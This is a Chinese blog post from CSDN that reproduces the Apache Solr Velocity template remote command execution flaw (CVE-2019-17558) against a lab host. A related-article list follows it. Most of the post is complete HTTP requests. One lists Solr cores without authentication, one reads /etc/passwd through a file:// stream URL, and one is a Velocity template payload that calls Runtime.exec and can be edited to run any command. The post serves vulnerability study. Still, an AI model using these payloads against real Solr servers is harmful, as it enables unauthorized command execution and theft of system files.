Apache Solr Velocity远程命令执行漏洞(CVE-2019-17558)复现尝试

最新推荐文章于 2024-04-20 23:43:48 发布
最新推荐文章于 2024-04-20 23:43:48 发布
阅读量414 收藏
点赞数
文章标签: 安全漏洞 docker 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17841153/article/details/115582547
版权

Apache Solr Velocity远程命令执行漏洞(CVE-2019-17558)复现尝试

参考链接https://blog.csdn.net/qq_43645782/article/details/107169228
https://blog.csdn.net/qq_45066095/article/details/112132748?utm_medium=distribute.pc_relevant.none-task-blog-2defaultBlogCommendFromMachineLearnPai2default-4.control&dist_request_id=1330147.8492.16180439489910651&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2defaultBlogCommendFromMachineLearnPai2default-4.control
https://vulhub.org/#/environments/solr/CVE-2019-17558/

Solr未授权访问:
在这里插入图片描述

通过以下API获取所有内核名称:
http://192.168.3.5:8983/solr/admin/cores?indexInfo=false&wt=json
在这里插入图片描述
查看配置文件:
http://192.168.3.5:8983/solr/demo/config
在这里插入图片描述

GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: 192.168.3.5:8983
User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG-SM-T377A Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述
查看/etc/passwd

POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.3.5:8983
User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG-SM-T377A Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 31
Content-Type: application/x-www-form-urlencoded


stream.url=file:///etc/passwd

在这里插入图片描述
通过Velocity模板执行ifconfig命令无反应,修改exec(%27whoami%27)中的代码即可更改命令:

POST /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ifconfig%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: http://192.168.3.5:8983
User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG-SM-T377A Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.3.5:8983/solr/
Content-Length: 0

在这里插入图片描述
直接访问:
在这里插入图片描述

我们好像在哪见过 t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现nuclei——CVE-2019-17558Apache Solr Velocity模板注入远程命令执行漏洞
记录并分享学习安全的知识点..
01-26 630
一、漏洞介绍 SolrApache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者经过未受权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,而后get访问接口致使服务器命令执行。 影响版本:Apache Solr 5.0.0 ~8.3.1(暂不确定)到最新版本。 二、漏洞产生的原因
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 578
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。VelocityApache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
漏洞复现----4、Apache Solrvelocity远程命令执行(CVE-2019-17558)
七天
11-26 1604
文章目录一、Apache Solr 简介二、CVE-2019-17558简介三、漏洞复现 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、CVE-2019-17558简介 在Ap
solr 历史漏洞复现之RCE漏洞CVE-2019-17558
最新发布
m0_66490812的博客
04-20 742
优先复现 Solr RCE 漏洞,严重等级较高漏洞Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)复现,python编写POC和EXP
wangqiao258的博客
10-06 518
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/solr/CVE-2019-17558/ [root@localhost CVE-2019-17558]# docker-compose up -d 查看端口: [root@localhost CVE-2019-17558]# docker ps CONTAINER ID IMAGE COMMAND CREA
漏洞复现Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
Hi~ 土拨鼠
12-26 493
文章目录一、漏洞简介二、漏洞环境搭建三、漏洞复现 一、漏洞简介 Solr 是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
m0_48520508的博客
02-19 1097
0x00简介 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。 Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。 0x01漏洞概述 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助Velocity
Apache Solr RCE (CVE-2020-13957)未授权上传漏洞 + Velocity模板远程执行CVE-2019-17558复现
ximo的博客
04-28 526
漏洞概述 (CVE-2020-13957)未授权上传漏洞: 在特定的Solr版本中ConfigSet API存在未授权上传漏洞 ,配合CVE-2019-17558执行任意命令。 (CVE-2019-17558Velocity模板远程执行: 攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。 配合CVE-2020-13957上传漏洞上传Core,进行攻击。 影响版本 CVE-2020-1395
Apache Solr Remote Code Execution Via Velocity Custom Template (CVE-2019-17558)漏洞复现
千寻的博客
02-24 347
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备第一步 使用dockers搭建环境第二步 访问网站第三步 漏洞点查看第四步通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:漏洞复现方法一:burp抓包方法二:Metasploit使用方法三:vulmap工具方法四: 工具利用修复建议笔记下载摘抄 漏洞名称 Apache Solr Remote Code Execution Via Velocity Custom Template
solr 远程命令执行漏洞复现 (CVE-2019-17558)
XXokok的博客
01-12 590
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。VelocityApache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
solr 远程命令执行 (CVE-2019-17558)
YouthBelief的博客
11-01 4954
solr 远程命令执行 (CVE-2019-17558前言一、solr 远程命令执行 (CVE-2019-17558)0x01 漏洞描述0x02 影响范围0x03 漏洞利用直接用脚本0x04 漏洞修复 前言 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。VelocityApache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 一、solr 远程命令执行 (CVE-2019-175
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 854
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令
apache solr 任意问题件读取 CVE-2019-17558
失心少年
11-03 305
olr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞,攻击者利用该漏洞可以直接获取到服务器权限。
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558
whojoe的博客
07-06 1359
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558)前言环境搭建漏洞复现参考文章 前言 影响Apache Solr 8.1.1到8.2.0版本 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2019-17558/ 启动容器 docker
Apache Solr Velocity注入远程命令执行(CVE-2019-17558)
m0_65150886的博客
02-27 498
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心。3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称。
Apache Solr 2020安全漏洞CVE-13957:未经授权的上传与RCE风险
"CVE-2020-13957 是一个针对Apache Solr的...3. 最后,通过发送一个查询请求到`http://ip:8983/solr/mytest2/select?q=1&wt=velocity&v.template=custom&v.template.custom`,并利用Velocity模板执行代码注入(CVE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值